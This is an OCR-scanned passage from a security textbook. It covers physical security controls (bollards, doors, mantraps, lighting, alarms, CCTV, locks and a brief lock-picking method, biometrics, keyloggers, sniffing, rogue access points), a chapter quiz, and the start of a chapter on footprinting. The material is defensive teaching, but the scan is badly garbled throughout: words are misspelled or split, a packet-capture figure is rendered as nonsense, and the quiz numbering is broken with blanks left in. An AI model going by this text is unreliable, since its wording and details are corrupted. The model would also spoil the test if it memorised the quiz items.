seeking to secure critical assets. You can read more at: http-Jfwww. fsqs.org/rfc5/rfc2 1 9&.html#ixzzQiPiLB2vn. PART 1 Hacker Techniques arid Tools Bo ardb may not always be as visible as a steel post or concrete barrier In some situations the bollards are cleverly hidden using landscaping or subtle design cues. For example, some locations (for example, malls or shopping centers) will place large concrete planters with trees or some other form of plants or decorations in front of entry points vulnerable to vehicle attacks. Another example is a retailer like Target, which often uses large concrete balls painted red in front of the main doors. While most customers may think of these as decorations or a representation of the Target logo r they are actually a form of bollard. Typically, bollards are hidden to be less imposing to customers, but still serve the designated function. Bollards Bollards are devices that can take many farms, but the goal is the same: prevent entry into designated areas by motor vehicle traffic. To get an idea of a location where bollards wonld be ideal and how they function, consider an electronics superstore such as Best Buy, In this case, lots of valuable merchandise is present and someone could very easily back a truck through the front doors after hours, load up on merchandise, and drive away quickly before law enforcement arrives. In the same situation, the placement of heavy steel posts or concrete barriers would stop a motor vehicle from even reaching the doors. Many companies use bollards to prevent vehicles from going into areas in which they are not permitted. Bollards, which can be concrete or steel, block vehicular traffic or protect areas where pedestrians may be entering or leaving buildings. While fences act as a first line of defense, bollards are a close second as they can deter individuals from ramming a facility with a motor vehicle. Bollards can come in many shapes, sizes, and types. Some are permanent, while others pop up as needed to block a speeding car from ramming a building or ram -raiding. Ram -raiding is a type of smash and grab burglary in which a heavy vehicle is driven through the windows or doors of a closed shop, usually one selling electronics or jewelry, to quickly rob it. Facility Controls In addition to bollards, other security controls offer protection, and each has to be evaluated to ensure that security requirements are being met. These security controls, or facility controls, come in the form of doors, windows, and any other entry points Into a facility. The weakest point of a structure is generally the first to be attacked. This means doors, windows, roof access, fire escapes, delivery access, and even chimneys are targets for attackers. In fact, anyone who has watched programs such as COPS or other iypcs of reality shows based on law enforcement long enough htis probably seen a handful of “dumb” criminals who got stuck trying to get into a chimney. This should serve as a reminder that you need strong facility controls and that you must provide only CHAPTER 4 Physical Security 91 the minimum amount of access required and restrict no authorized individuals from secure areas. Some of the ways to achieve these goals is by examining and assessing the following: • Doors, mantraps, and turnstiles • Wa Lis, ceil ing s« and floo rs • Windows • Guards and dogs • Construction • Doors, Mantraps, and Turnstiles Cxcept for the majority of exterior doors, most doors are not designed or placed with security in mind. While doors in li horn v environment that are not designed with security as a goal are fine* the same cannot be said for those in a business environment, Business environments should always consider solid core doors as the primary option for doors unless otherwise spedlied. The advantages between solid and hollow are obvious when you consider just how easily hollow core doors can be defeated. Consider that an attacker with a good pair of boots on can kick through a hollow core door quite easily, A door designed for security will be very solid and durable and have hardened hardware. While the tendency for businesses to cut costs wherever possible is a known fact, it should be discouraged when purchasing doors by selecting the type of door only after security needs have been assessed. Low-cost doors are easy to breach, kick in, smash, or compromise. A solid core door should always be used lor tin 1 protect Ion of a server room or other critical assets. Doors also need to have a tire rating assigned to them, which is another item to be considered before installing. Doors come in many configurations, including the following: • Industrial doors • V ehic I e acc ess d oors • Bulletproof doors • Vault doors • Is just having a well-selected door the end of the problem? Absolutely not; you must consider the frame that the door is attached to. A good door connected to a poorly designed or constructed frame can be the Achilles heel of an otherwise good security mechanism. During a security review, it is also importan t to examine not only the doors in place but also the hardware used to attach the door to the frame and the frame itself. Consider the fact that something lis simple as installing the hinges incorrectly to a door and frame can make them easy for a potential intruder with a screwdriver to bypass. Critical areas secured with doors should be hinged to the inside, This type of design makes it much harder for a criminal to gain access. This means that hinges and strike plates must be secure. NOTE While the importance of selecting the correct door is not something to be overlooked by the security professional, also understand that proper evaluation may require the services of a specialist. Because an information security professional doesn’t usually have a background in construction or carpentry, it is important to consult with a specialist who better understands the issues Involved. PART 1 Hacker Techniques and Tools Some doors are hinged on the outside and are designed to open out. Exterior doors are a good example of this. While the hinges are protected, the open -out feature of the door provides tin invaluable safeguard against people getting trapped in a building in the event of a fire or other emergency. These doors are more expensive because they are harder to install and remove. Common places to observe these types of doors are shopping malls and other public facilities,, specifically the exit doors. In some cases, exit doors are even equipped with a panic bar that can help when large crowds rush the door and need to leave quickly. Companies should also be concerned about the flow of traffic into the facility. This is the type of situation where a device known as a mantrap can prove helpful A mantrap is a structure that replaces a normal single door with a phone booth-sized object with a door on each side. When an individual enters the mantrap there is only enough space for one person at a time, and only one door can be opened at a time. The structure’s design allows individuals to be screened via a camera or code to ensure that every indivi- dual is supposed to be entering and (in some cases) exiting the area. While mantraps are designed to regulate the How of traffic in and out of an area, they specifically stop piggybacking, which is the practice of one individual actually opening the door to let several enter. Another type of physical control device in common usage is the turnstile, which is commonly used at sporting events, subways, and amusement parks. Turnstiles can be used to slow the flow of traffic into areas or even ensure that individuals are properly screened and authenticated prior to entering an area. Walls, Ceilings, and Floors Working In concert with doors are the walls that the doors or mantraps Eire embedded into, A reinforced wall can keep a determined attacker from entering an area through any point other than the defined doors. On the other hand, a poorly constructed wall may present no obstacle at all and allow an intruder to kick through. Construction of walls should take into consideration several factors in addition to security, such as the capability to slow the spread of lires. Walls should run from the slab to the roof. Consider one of the more common mistakes that can be a detriment to security: the false wall. These are walls that run from the floor up to the ceiling, but the ceiling isn’t real; it’s but a drop ceiling that has a good amount of space between it and the roof. An attacker needs only a table,, a chair, or a friend for a foothold to push up the ceiling tile and climb over. If asked to perforin a physical security assessment of a data center or other type of high value physical assets check to see that the wall runs past the drop ceiling. Also tap on the wall gently and check to see whether it is hollow or of a solid construction. For ceilings, the weight-be el ring load and fire ratings must be considered. For dropped ceilings, the walls should extend above the ceiling, especially in sensitive areas. Any ceiling-mounted air ducts should be small enough to prevent an intruder from crawling CHAPTER 4 Physical Security 93 l h rough litem. The siah of Lhe facility needs to have the proper weight load, lire rating, and drains. When dealing with raised floors, you will want to make sure the flooring is. grounded and nonconducting, In areas with raised floors, the walls should extend below the false floor. NOTE A com in on decorative feature is the glass block wall commonly seen in locations such as doctors’ offices or lobbies, While such Windows Windows serve several purposes in any building or workplace: “‘opening up* the office to let more light in and giving the structures and designs do look attractive, they can very easily be seen through and a kick of a boot can get through most designs. inhabitants a look at the world outside. But what Eibout the security aspect? While windows let people enjoy the view, security can never be overlooked. Depending on the placement and use of windows, anything from tinted to shatterproof windows may be required to ensure that security is preserved. It is also important to consider that in some situations the windows may need to be enhanced through the use of sensors or alarms. Window types include c he following: • Standard — The lowest level of protection. It’s cheap, but easily shattered and destroyed. Polycarbonate acrylic — Much stronger than standard glass, this type of plastic offers superior protection. • Wire reinforced — Adds shatterproof protection and makes it harder for an intruder to break and access. Laminated — Similar to what is used in an automobile. By adding a laminate between layers of glass, the strength of the glass is increased and shatter potential is decreased. • Solar film — Provides a moderate level of security and decreases shatter potential* • Security film Used to increase the strength of the glass in case of breakage or explosion. • Guards and Dogs For areEis where proper doors, fences, gates, and other structures cannot offer the required security, other options include guards or dogs. Guards can serve several functions just by being present: guards can be very real deterrents in addition to introducing the ” human element” of security — they have the ability to make decisions and think through situations. While computerized systems can provide vital security on the physical side, such systems have not reached the level where the human element can be replaced. Guards add discernment to on site security. PART 1 Hacker Techniques and Tools Of course, as the old saying goes. ‘”You don’t get something for nothing” and guards are no exception to this old rule. Guards need lo be screened before hiring, background checks and criminal background need to be performed, and, if needed, security clearances must be obtained, Interestingly enough, however, increased technology has in part driven the need for security guards. More and more businesses have closed-circuit television (CCTV), premise control equipment, intrusion detection systems, and other computerized surveillance devices. Guards can monitor such systems. They can fill dual roles, and monitor, greet, and escort visitors, too. Guards cost money. However, if a company does not have the money for a guard, there are other options. Dogs have been used for centuries for perimeter security. Breeds such as German shepherds guard facilities and critical assets. While it is true that dogs are loyal, obedient, and steadfast, they are not perfect and might possibly bite or harm the wrong person because they do not have the level of discernment that human beings possess. Because of these factors, dogs are usually restricted to exterior premise control and should be used with caution. Construction Construction of a facility has as much to do with the environment in which the facility is to be located as does the security it will be responsible for maintaining. As an example, a facility built in Tulsa, Oklahoma, has much different requirements from one built in Anchorage, Alaska, One is concerned with tornadoes; the other with snowstorms. The security professional is expected in most cases to provide input on the design or construction of a new facility or the functionality of a preexisting facility that the company is considering. When this situation arises consider the following factors: • What are the unique physical security concerns of the organization’s operations? • Do redundancy measures exist I such as backup power or coverage by multiple telecom providers)? • Is the location particularly vulnerable to riots or terrorism? • Are there any specific n a t u ral/e n vi ron me n tal concerns for the specific region in which construction is being considered? • Is the proposed construction close lo military bases, train tracks, hazardous chemical production areas, or other hazards? • Is the construction planned in high crime neighborhoods? r How close is the proposed construction to emergency services such as the hospital, fire department, and police station? Personal Safety Controls The bulk of what has been discussed up to this point has focused on the protection of assets such as computers, facilities and data; however, the human factor has been overlooked. Any security plan must address the protection and security of all assets. CHAPTER 4 Physical Security and ibis absolutely includes both silicon-based assets and carbon-based ones. There is a wide assortment of technologies specifically designed to protect not only people but also the organization itself, including the following: ■ Lighting • Alarms • CCTV Lighting Lighting is perhaps one of the lowest-cost security controls that can be implemented by an organization. Lighting can provide a welcome addition to locations such as parking gEirages and huiLJing perimeters. Consider the tact iluit wiien pro per L\ phurd. Ugh liny, oati eliminate shadows and the spots that cameras or guards can’t monitor, as well as reduce the places in which an intruder can hide. Effective lighting means the system is designed to put the light where it is needed and in the proper wattage as appropriate, Lights are designed for specific types of applications. Some of the more common types of lights include these: ■ Continuous — Fixed lights arranged to Hood an area with overlapping cones of light (most common) • Standby — Randomly turned on to create an impression of activity Movable — Manually operated movable search lights; used as needed to augment continuous or standby lighting • Emergency — Can duplicate any or all of the previous lights; depends on an alternative power source Two issues that occur with lighting are over lighting and glare. Too much light, or overly bright lights, can bleed over to the adjacent owner’s property and be a source of complaints. Too much light can also lead to a false sense of security because a company may feel that because all areas are lit, intrusion is unlikely. Additionally, when lighting is chosen incorrectly, it is possible to introduce high levels of idarc. (11 Eire can make it lough for those tasked with monitoring an area to observe all the activities thai may be occurring. When placing lighting, avoid any placement that directs the lighting toward the facility and instead direct the lights toward fences, gates, or other areas of concern such as access points. Also consider the problems associated with glare when guards are present; for example, if guards are tasked with checking IDs at a checkpoint into a facility, ensure that the lights are not directed toward the guards. This offers good glare protection to the security force and guards. Alarms and Intrusion Detection Alarms and physical intrusion detection systems can also increase physical security. Alarms typically are used to provide an alert mechanism if a potential break-in or tire has been detected. Alarms can have a combination of audible and visual indicators that allow people to see and hear the alarm and react to the alert. Alarms are of no use if no one can 96 PA RT 1 H ac ke r Techn iq ues and Too I s hear or see the alert and respond accordingly. More advanced alarm systems even include the ability to contact lire or police services if the alarm is activated after business hours, for example. Of course, a drawback is the simple fact that if an alarm system is tied to the police or fire department, false alarms could result in being assessed lines. Additional options that can enhance physical intrusion detection are motion, audio, infrared wave pattern, and capacitance detection systems. Of these systems, infrared detection tends to be one of the most common, but I Lice any system, these have both pros and cons. Infrared systems are expensive and they may be larger than other com pu mhle devices, but at the same time the systems can detect activity outside the normal visual range. Another popular form of intrusion detection systems are those devices sensitive to changes in weight, and such systems may be useful when used with mantraps because they can detect changes in weight that may signal a thief. If asked to provide guidance to an organization on what type of IDS to consider imple- menting, always take the situation In In account. What is important to avoid is placing a too complex or inappropriate [E)S for the given situation. For example, systems that detect weight changes may not be as important or may even be completely unnecessary in situations where theft is nai n concern. Also keep in mind that IDSs arc not foolproof and are not an excuse for avoiding using common sense or other security controls. Any guidance on what type of IDS to implement should also mention that human involvement is essential. Closed-Circuit TV {CCTV) Another mechanism that can be used to protect people and potentially deter crime is CCTV. CCTV usually works in conjunction with guards or other monitoring mechanisms to extend their capacity. When dealing with surveillance devices, you must understand factors such as focal length, lens types, depth of Held, and illumination requirements. As an example, the requirement of a camera that will be placed outside in an area of varying light is much different from one placed inside In a fixed lighting environment, Also, there is the issue of focal length, which defines the camera’s effectiveness in viewing objects from a horizontal and vertical view. Short focal lengths provide wider angle views while longer focal lengths provide more narrow views. When considering placement of CCTV. keep in mind areas such as perimeter entrances and critical access points. Activity can be either monitored live by a security officer, or recorded and reviewed later, if no one is monitoring the CCTV system t it effectively becomes a detective control because it will not prevent a crime. In these situations, the organization is effectively alerted to the crime only after the fact, when the rec ordings are re v i ewe d , 1 MOTE Modern CCTV systems cart provide additional features such as the ability to alert the monitoring agency or organization in the form of e-mail or other similar methods, These systems can be said to be smart in that they can even be configured in some instances to send these alerts on ty during certain hours. i CHAPTER 4 Physical Security Physical Access Controls 97 A physical access control can be defined as any mechanism by which an individual! can be granted or denied physic til access. One of the oldest forms of etc cess control is the mechanical lock. Other types of physical access control include ID badges, to kens h and biometrics. Locks Locks, which come in many types, sizes, and shapes* are an effective means of physical access control. Locks are by far the most widely implemented security control due largely to the wide range of options available as well as the low costs of the devices. Lock types include the following: • Mechanical — Warded and pin and tumbler • C i p he r — Sm a rt a n d prog r a m m able Warded locks are the simplest form of mechanical lock. The design of mechanical locks uses a series of wards that a key must match up to in order to open the lock. While it is the cheapest type of mechanical lock it is also the easiest to pick. Pin and tumbler locks are considered more advanced. These locks contain more parts and are harder to pick than warded locks. When the correct key is inserted into the cylinder of a pin and tumbler lock, the pins are lifted to the right height so that the device can open or close. More advanced and technically complex than warded or pin and tumbler locks are cipher locks, which have a keypad of fixed or random numbers that requires a specific combination to open the Jock. Before selecting a lock, consider the tact that not all locks are alike, and locks come in different grades. The grade of the lock specifies its level of construction. The three basic grades of locks are as follows: Grade 1 — Commercial locks with the highest security Grade 2 — Light-duty commercial locks or heavy-duty residential locks Grade 3 — Consumer locks with the weakest design NOTE Although a Grade 3 lock is fine for use in residential applications, it is not acceptable for a critical business asset. Always check the grade of a lock before using it to protect the assets of a company. Lock Picking While locks are good physical deterrents and work quite well as a delaying mechanism, a lock can be bypassed through lock picking. Criminals tend to pick locks because it is a stealthy way to bypass a lock and can make it harder for the victim to determine what has happened. 98 PA RT 1 H ac ke r Techn iq ties and Too I s The basic components used to pick locks are these: • Tension wrenches — Like small, angled Hathead screw- drivers. They come in various thicknesses and sizes. • Picks — Just as the name implies, similar to dentist picks: small angled, and pointed. Together, these tools can he used to pick ei lock. One example of a basic technique used to pick a lock is scraping. With this technique, tension is held on the lock with the tension wrench while the pins are scraped quickly. Pins are then placed in a mechanical bind and will he stuck in the unlocked position. With practice, this can be done quickly so that all the pins stick and the lock is disengaged. Tokens and Biometrics Tokens and biometrics are two ways to control individuals as they move throughout a facility or attempt to access specific areas. Tokens are available in many types and can range from basic ID cards to more intelligent forms of authentication systems. Tokens used for authentication can make an access decision electronically and come in several different configurations^ including the following: Active electronic — The access card has the ability to transmit electronic data. Electronic circuit — The access card has an electronic circuit embedded. • Magnetic stripe — The access card has a stripe of magnetic material • Magnetic strip — The access card contains rows of copper strips. • Contactless cards — The access card communicates with the card reader electronically. • Con tactless cards do not require the card to be inserted or slid through a reader. These devices function by detecting the proximity of the card to the sensor. An example of this technology is radio frequency ID (RFID). R I” 1 1 Ms an extremely small electron ic device that is com posed oi ei microchip and antenna. Many l\Y\) dev ices are passive devices. Passive devices have no battery or power source because they are powered by the RFID reader. The reader generates an electromagnetic signal that induces a current in the RFID tag. Another form of authentication is biometrics. Eiometric authentication is based on a behavioral or physiological characteristic that is unique to tin individual, Eiometric authentication systems have gained market share because they are seen as a good replacement for password-based authentication systems, Different bio metric systems have various levels of accuracy. The accuracy of a biometric device is measured by the percentage of Type 1 and Type 2 errors it produces. Type 1 errors or false rejections are reflected by what is known as the false rejection rate (FRR). This is a measurement of the percentage of individuals who should have been granted, but were not allowed access. A Type 2 error or false acceptance is reilecled by the false acceptance rate (FAR) which is a measurement of the percentage of individuals who have gained access but should not have heen granted such. fx NOTE Before purchasing a lock picking set, be sure to investigate local laws on the matter. In some states, the mere possession of a lock picking set can be a felony. In other states, possession of a kick picking set is not a crime in and of itself, but using the tools during the commtsston of a crime is, CHAPTER 4 Physical Security Some co mm mi bio metric systems include the following: Finger scan systems — Widely used, popular, installed in many new laptops ■ Hand geometry systems — Accepted by most users: functions by measuring the unique geometry of a user’s fingers and hand to identify them • Palm scan systems — Much like the hand geometry system h except it measures the creases and ridges of a user for identification • Retina pattern systems — Very accurate: examines the user’s retina pattern • Iris recognition — Another eye recognition system that is also very accurate; it matches the person’s blood vessels on the back of the eye • Voice recognition — Determines who you are by using voice analysis Keyboard dynamics — Analyzes the user’s speed and pattern of typing • No matter what means of authentication you use. a physical access control needs to fit the situation in which will be applied. As an example, if the processing time of a biometric system is slow, users tend to just hold the door open for others rather than wait for the additional processing time. Another example is an iris scanner, which may be installed at all employee entrances, yet later causes complaints from employees who are physically challenged or in wheelchairs because they cannot easily use the newly installed system. Consider who will be using the system and if it may be appropriate given the situation and user base. Avoiding Common Thre ats to Physical Security With so much talk in this chapter of controls and items to look for during an assessment, it is important to be aware of some of the threats an organization can face. Some common threats include these: • Natural/ human/technical threats • Physical key loggers • ■ Sniffers • W irele ss i n terce ption • Rogue access points • Natural, Human, and Technical Threats Every organization must deal with the threats that are present in the environment each day. Threats can be natural, human, or technical. Natural threats can include items such as fires, floods, hurricanes, tropical storms, tidal waves, and earthquakes. Human threats are not always as predictable as natural threats. For example, anyone living in California knows that earthquakes will Jul. hist they just can’t say when. However, an organization may expect someone to attempt or even succeed in breaking in to the company, bui the attempt may never come. The point here is that aside from natural 100 PA RT 1 H ac ke r Techn iq ues and Too I s disasters, you m ust think of other threats such as hackers who do not issue notices when an attack is coming. Any organization can be threatened by outsiders or insiders: people that are apparently trusted or unknown individuals. Human threats can include the following: • Theft — Theft of company assets can range from mildly annoying to extremely damaging, A CEO’s laptop may be stolen from I he hotel lobby; but is the real loss the laptop or the plans for next year’s new software release? • Vandalism — From broken windows caused by a teenager just having some malicious fun to the hacker who decides to change your company’s Web page, each is destroying company property • Destruction — This threat can come from insiders or outsiders. Destruction of physical assets can cost organizations money that was destined to be spent on other items, ■ Terrorism — This form of threat is posed by individuals or groups that wish to prove a point or draw attention to a cause • Accidental — Accidents are bound to happen sooner or later and their effects can be varied depending on the situation. Damage could range from lost data or an tut acker obtaining access where they should not have. Any company can also be at risk due to technical issues, A truck driver can knock down a power pole in front of the company, or a hard drive in a server might fail, Each can and will affect the capability of the company to continue to provide needed services. Whenever a security professional is asked to perform a physical review, don’t neglect physical controls that are needed to protect against these or any of the various types of issues that Eire present. Any equipment failure and loss of service can affect the physical security of the organization. Physical Keyloggers and Sniffers Hardware keyloggers are physical devices used to record everything a person types on the keyboard. These devices are usually installed while the user is away from the desk. Keystroke loggers can be used for legal or Illegal purposes, such as the following: » Monitoring employee productivity and computer activity • Law enforcement • Illegal spying Physical keyloggers can store millions of keystrokes on a small device that is plugged in between the keyboard and the computer. Some keyloggers are built into keyboards. The process is transparent to the end user and can be detected only by iinding the keylogger. CHAPTER 4 Physical Security 101 Key loggers can be the following: • Attach ed Lo t h e key bo a rd c tib le . as in li n e de vices • Installed inside standard keyboards • Inst a lied ins id e re p lacement key bo a rds • Installed on a system along with other software • Sniffing is the basis for a large number of network-based attacks. If attackers can gain access to the network via a physical network connection, they can begin to capture traffic, Sniffing can be passive or active. Passive sniffing re ties on a feature of network cards called “promiscuous mode/” When placed in promiscuous mode, a network card passes all packets on to the opcraling system, rather than just those unicast or broadcast to the host. Active sniffing, on the other hand, relies on injecting packets into the network, causing traffic thai should not be sent to your system to be sent to your system. Active sniffing was developed largely in response to switched networks. Snifiing is dangerous in that it allows hackers access to traffic they should not see. An example of a sniffer capture is shown in Figure 4-1. j NOTE Even if the IT or security department of your company is pfanning to use these devices for legal purposes, always consult with a lawyer or with the human resources department. Use of such devices in some instances can be a serious legal issue and expose the company to legal action. Efe t. « Q* ,JHiim+ £rV**ft SMalti ft a a * + 2 ‘ J [(■”-. ‘■••'< ■ : | . Tr* Sew* r*»i 1 (40 byt-M on vr\rm r t>0 byt«S capturttl} t hrn«t ti„ Sr-c: zyxe lc.sffL.,2 1:19: £d (0Q :40: 01: 21:19 ;£d> 4 05 1: ngt tje f • 2 ■■j : 5 E (00: 09: 5b: If :2fc: SSl Destination; Neto^a r„if ; r i J B tOQ ; 09 r 5b rlf ; 2 1 * : S EO source: zy*elce«_21 :19:ad COO:«0:(tti2I :19:Bd) Typ=: CokosoO) Triilir: 0OFFFFFFFF£F m:ernet proioct)!. Src: 1S2. 16«. 12 3.151 (19 2 .169, 123.1EL), &St E 192. 166,123.101 £192 ,l*a, 12 3,101} VffrslOrti 4 Header length: £0 bytes Different tat pd Services Field: 000 (OSCP 000: default; KM: 000} Toc.il L n^th: 40 Identification; 0x62b (651) rUgi: 5> «P Frupervi offset: 0 Ttmr ltv»: 3J protocol; tcp (0x0*5 neader chectisun: Oxlfda [correct] source: i«, iei <i«.i&e,i23.ia> test 1 nation: IK. 16B.123. 101 (192 . 16S. 12 3 . 101) r.rvnTH?i1gn Control Prgrtocpl, Src Pprt: print pr (511>, 0?t PUTt : 304 (3J0O, S*q: 0, A** : 0, Lr»: 0 ■r 1 C’vyg g’> ft if S3 . J, M’ 5;; vy -U „■ 0010 00 IB 02 4b 00 00 JO 04 If da cO aft 7b b* cO aS 0020 7t> 61 02 03 Ofi 73 71 10 SO 05 fa 3f 6fa 6C 50 10 &03t> » « «f rt M 06 00 f f Tf ff ff ff ■ i £ . flr “. . W ‘■ – – – C i 1 + + It II I * 4 +I + K FIGURE 4 1 |H D 1UM fltJ-jut 0 Wireshark sniffer. 102 PART 1 Hacker Techniques and Tools Wireless Interception and Rogue Access Points While you will read more about wireless networks and their security vulnerabilities in Chapter 8, we will mention some of the basics here as a brief introduction. Sniffing is not restricted to wired networks. Wireless signals emanating from cell phones, wireless local area networks (WLAKs). Bluetooth devices, and other modern equipment can also he intercepted and analyzed by an attacker with the right equipment. Even when signals cannot be intercepted, they can still potentially be jammed. For example, a cell phone jammer could transmit a signal on the same frequencies that cell phones do and then prevent all cell phone communication within a given area. Moving on to other current technologies, the discussion now turns to another wireless technology: Bluetooth, which is a short-range communication technology that has been shown to be vulnerable to attack. One such attack is Blue) a eking, which allows an individual to send unsolicited messages over Bluetooth to other Bluetooth devices, WLANs are also vulnerable to attacks. These attacks can be categorized into four basic categories: etivesdropping, open authentication, rogue access points, and denial of service. Finally, the attacker may attempt to set up a fake access point to intercept wireless traffic. Such techniques make use of a rogue access point. This fake access point is used to launch a man -in -the -middle attack. Attackers simply place their own access points in the same area as users and attempt to get them to log on. Defense in Depth NOTE Another way to think of defense in depth is as avoiding putting all your eggs in one basket. Something that has been mentioned indirectly a few times already is the concept of defense in depth. The concept of defense in depth originated from the military and was seen as a way to delay rather than prevent an attack. As an information security tactic, it is based on the concept of layering more than one control, These controls can be physical, administrative, or technical in design. We have looked at a variety of physical controls in this chapter such as locks, doors, fences, gates, and barriers. Administrative controls include policies and procedures on (among other things) how you recruit, hire, manage, and ii re employees. During employment, administrative controls such as least privilege, separation of duties, and rotation of duties are a few of the items that must be enforced. When employees leave or are fired, their access needs to be revoked, accounts blocked, property returned, and passwords changed. Technical controls are another piece of defense in depth and can include items such as encryption, firewalls, and IDS, For the physical facility, a security professional should strive for a mini mum of three layers of physical defense. The iirsl line of defense is the building perimeter. Barriers placed here should delay and deter attacks. Items at this layer include fences, gates, and bollards. These defenses should not reduce visibility of CCTV and/ or guards. Items such as shrubs should be IS to 24 inches away from all entry points, and hedges should he cut six inches below the level of all windows. CHAPTER 4 Physical Security 103 The second layer of defense is the building exterior: roof, walls, floor, doors, and ceiling. Windows are a weak point here. Any opening 18 feet or less above the ground should be considered a potential I easy access and should be secured if greater than 96 square inches. The third layer of physical defense is the interior controls: locks, safes* containers, cabinets, interior lighting, It can even include policies and procedures that cover what controls arc placed on computers, I tiptops, equipment and storage media. This third layer of defense is important when you consider items such as the data center or any servers kept onsite. A well-placed data center should not be above the second floor of a facility because a fire might in tike it inaccessible. Likewise, you wouldn’t want the data center located in the basement because it could be subject to flooding. A we 1 1 -placed data center should have limited accessibility — typically no more than two doors. Keep these items in mind because they will help you secure the facility. This chapter is unique in that so much of ethical hacking and penetration testing is about IT and networks. However, the reality is that attackers will target an organisation any way that they can. Not all attacks will be logical in nature: many are physical. II’ attackers can gain physical access to a facility, many potentially damaging actions can occur: from simply unplugging a server and walking out with it to sniffing traffic on the network. Physical controls can take many forms and be implemented lor any number of reasons. Consider that physical controls such as doors, fences, and gates represent some of the first barriers that an attacker will encounter. When constructed and placed properly, fences can provide a tremendous security benefit, stopping all but the most determined attacker. Other types of controls that can be layered into the existing physical security system include alarm and intrusion detection systems, both of which provide an early warning of intrusions. CHAPTER SUMMARY KEY CONCEPTS AND TERMS Biometrics Bluetooth Bollard False acceptance rate (FAR) False rejection rate [F RR) Lock Turnstile 104 PART 1 Hacker Techniques and Too Is CHAPTER 4 ASSESSMENT 1. Physical security Is less Important than Logical security A, True B. False 1. is a common physical control that can be used as both a detective and reactive took A, A Fence B, An alarm e CCTV II A lock 1. For a fence to deter a determined intruder , it should be at least feel tall. A. Four U. Five C, Six \1 Ten 1. A{n) is used to prevent cars from ramming a building. 1. While guards, and dogs arc both good for physical security, which of Ihe following more commonly applies to dogs? A, Liability B, Discernment C Dual role D Multifunction 1. YVhul tinide of lock would be appropriate to protect a critical business asset? A, Grade 4 B, Grade 2 C, Grade 1 D Grade 3 1. defines the camera’s effectiveness In viewing objects from a horizontal and vertical view. A. Granularity B. Ability to zoom C. Field of view D Focal length JJ. In the field of IT security, the concept of defense in depth Is layering more than one control on another. A. True B. False 1. is an intrusion detection system used exclusively in conjunction with fences A. Infrared wave patter B. .Motion de lector C. RF1D 0. F1DAS 1. A Type 2 error is also known as what? A. False rejection rate B. Failure rate C. Crossover error rate ft. False acceptance rate 1. Which type of biometrlc system is frequently found on laptops? A. Retina B. Fingerprint C. Iris Dl Voice recognition 1. What do luck pick scls typically contain at a minimum? A. Tension wrenches and drivers B. A pick C. A pick and a driver D. A pick and a tension wrench 1. During an assessment you discovered that the target company was using a fax machine. Which of the following is I lie h’usi important: A. The phone number is publicly available. B. The fax machine is in an open, unsecured area. C. Faxes frequently sit in the printer tray. D. The tax machine uses a ribbon. PART TWO A Technical Overview of Hacking C C chapter 5 Footprinting Tools and Techniques 106 chapter e Port Scanning 137 chapter 7 j Enumeration and Computer System Hacking 159 chapter a Wireless Vulnerabilities 186 chapter 9 Web and Database Attacks 209 CHAPTER 10 Ma I ware, Worms, and Viruses 232 CHAPTER 11 Trojans and Backdoors 252 CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks 276 CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools 299 Foot printing Tools and Techniques WHEN THINKING ABOUT HACKING into systems, you might think that hackers simply use a few software tools to gain access to the target. Although it is true that there are a multitude of tools available to facilitate this very action, effective hacking is a process that takes place in phases. Each phase in the hacking process should be undertaken with the goal of uncovering increasingly useful information about a target that can be used in the eventual break-in. The first phase of hacking is the footprinting phase, which is specifically designed to passively gain information about a target. If done correctly and patiently it is possible for skilled attackers to gain valuable information about their intended target without alerting the victim to the impending attack. Information that is possible to gain during this phase can be somewhat surprising because it is possible to obtain information such as network range, equipment/technologies in use, financial information, locations, physical assets, and employee names and titles. A typical company generates a wealth of information as a byproduct of its operations, and such information can be used for any purpose that an attacker may have in mind. In this chapter, the process that hackers use will be introduced along with the techniques that are used during each step of the process. An understanding of the techniques that hackers use will provide valuable insight into not just the mechanics of the process but also how to thwart them in the real world. In this chapter, special emphasis will be placed upon the first of the phases: footprinting. Chapter 5 Topics This chapter covers the following topics and concepts: What the information-gathering process entails • What type of information can be found on an organization’s Web site • How attackers discover financial information ■ What the nature of Google hacking is • How to explore domain information leakage • How to track an organization’s employees • How insecure applications are exploited How to use some basic counter measures Chapter S Goals When you complete this chapter, you will be able to: • State the purpose of footprinting List the types of information typically found on an organization’s Web site • Identify sources on the World Wide Web used for footprinting S h o w h o w atta eke rs m a p o r g a n i za t o n s • Describe the types of information that can be found about an organization’s key employees • List examples of unsecured application used by organizations • Identify Google hacking The Information-Gathering Process Although this chapter will place emphasis on the footprinting phase of the hacking and information-gathering process, seven steps are actually used. The steps of the in formation -gathering process include: 1. Gathering information • Determining the network range • Identifying active machines • Fin din g ope n po rts an d acces s points • 5 . D etec 1 1 n ii o p c ra ling systems 108 PART 2 A Technical Overview of Hacking 1. Using Qngerp ri nting serv ices • M Eipping the network • Of the seven steps, footprinting covers the lirst two steps in the process. Note that steps 1 and 2 are both passive in nature; they do not require direct interaction with the victim. This is one of the key characteristics of footprinting; to gather inform tit ion about a victim without directly interacting and potentially providing advance notice of the atlack. The following list shows some of the activities an attacker can perform when footpri nting an organisation: • Examine the company’s Web site • Idenlify key employees • A na lyz e o pen positions and ] o b req uest s • Assess affiliate, parent, or sister companies • Find technologies and software used by the organization • Determine network address and range • Review network range to determine whether the organization is the owner or if the systems are hosted by someone else » Look for employee postings, blogs, and other leaked information • Review collected dtita Under the right conditions, a skilled hacker can gather the information mentioned here and use the results to fine-tune what will be scanned or probed on the victim. Remember that the most effective tools that can be employed during this phase are common sense and detective work. You must be able to look for the places where a company may have made information available and seek such information, In fact, footpri nting may be the easiest part of the h tic king process because most organisations generate massive amounts of information that is made available online. Before a skilled hacker fires up an active tool, such as a port scanner or password cracker, he or she will meticulously carry out the footpri nting process to plan and coordinate a more effective attack. The Information on a Company Web Site When starting the foot printing phase, do not overlook some of the more obvious sources of information, including the company’s Web site. As anyone who has used the Internet can attest. Web sites offer various amounts of information about an organization because the Website has been published to tell customers about the organization. Although Web sites contain much less sensitive data now than was seen in the pEist, it is still not uncommon to come across Web sites that contain e-mail addresses, employee names, branch office Locations, and technologies the organization uses. An example of an average Web site and some information you might find is shown in Figure 5-1 . One problem with Web sites that has only recently been overcome is the amount of sensitive Information that can be accessed by the public, Sometimes without even realizing it, a company will publish a piece of information that seems insignificant, CHAPTER 5 Footprinting Tools and Technique 109 Superior Sviu fitmy Mission Statement About Us FIGURE 1-1 Company management. L I Supefw Sol/Oore, ttea mti>erk swrtlf Cffwltnq Ffrti. Oj «rvC« include , jjflrtlr Jtcn to I rig, 